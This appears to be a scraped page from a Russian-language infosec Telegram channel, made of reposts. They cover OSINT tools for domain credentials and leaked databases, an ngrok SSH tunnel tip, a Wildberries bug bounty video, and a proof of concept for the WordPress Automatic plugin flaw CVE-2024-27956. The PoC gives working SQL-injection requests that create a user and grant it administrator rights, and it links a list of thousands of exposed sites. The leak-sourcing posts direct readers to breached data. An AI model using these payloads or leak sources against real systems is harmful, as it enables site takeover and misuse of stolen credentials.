Fsecurity | HH
Open in Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Show more2 007
Subscribers
No data24 hours
-27 days
-1230 days
Posts Archive
2 008
Repost from Life-Hack - Хакер
Chiasmodon
#OSINT
Поиск данных, связанных с доменом, включая электронную почту домена, учетные данные домена (имена пользователей и пароли), CIDR (Classless Inter-Domain Routing), ASN (Autonomous System Numbers) и субдомены. Инструмент позволяет пользователям осуществлять поиск по домену, CIDR, ASN, электронной почте, имени пользователя, паролю или идентификатору приложения Google Play.
Ссылка на инструмент.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
2 008
Repost from Venator | OSINT Браузер
РЕЛИЗ Venator Red 2.0 ❗️
❗️ОБНОВЛЕНИЕ:
• Добавлено огромное количество источников для работы с утечками баз данных.
Форумы, ведущие Telegram-каналы с самыми свежими утечками 📕
• Обновлен список OSINT-инструментов для работы в Darknet
• ПОЛНОСТЬЮ переработана сортировка источников в браузере 🔺
п.с. для большей безопасности мы поставили строгие параметры для подключения только к серверам определенных стран. Поэтому если у вас не идёт подключение, попробуйте или VPN поставить, или удалить файл torrc по адресу - Venator Red 2.0\Tor Browser\Venator\Browser\TorBrowser\Data\Tor
п.с. 2
Огромное спасибо всем, кто оказывает поддержку на нашем Boosty. Благодаря вам проект всё активнее развивается и становится всё лучше и лучше
Скачать:
Yandex Disk
Google Disk
2 008
Repost from 1N73LL1G3NC3
+1
👩💻 PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)
Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly.
Adding a new WordPress user:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
Giving the user admin rights:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c
PWNED!
Note: Param "integ" is the md5sum of the query.
6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22
Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=122 008
Repost from Life-Hack - Хакер
Ngrok: Агент обратного туннелирования SSH
Знаете ли вы, что можно использовать ngrok, даже не устанавливая его? Вы можете запустить туннелирование через SSH, не загружая агент ngrok, с помощью команды:
ssh -i ~/.ssh/id_ed25519 -R 80:localhost:80 v2@tunnel.us.ngrok.com http
Читать подробнее:
https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent/
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации2 008
Repost from WB на связи!
Bug bounty для бизнеса, или как взломать Wildberries
Уже не первый год мы реализуем программу поиска уязвимостей в системах за вознаграждение. Сейчас в область исследования входят все ресурсы компании, включая сервисы для покупателей, продавцов, курьеров, исполнителей на складах и пунктах выдачи заказов.
В новом видео мы расскажем:
🔵как работает программа и каких результатов удалось достичь команде,
🔵что мотивирует этичных хакеров на участие и сколько можно заработать,
🔵какие дополнительные преимущества можно получить в комьюнити.
Разобраться в этом нам помогут:
➡️Александр Хамитов, руководитель направления продуктовой безопасности Wildberries,
➡️Рамазан Рамазанов, этичный хакер и активный участник программ Bug bounty.
💜 Смотрите на нашем YouTube-канале
Available now! Telegram Research 2025 — the year's key insights 
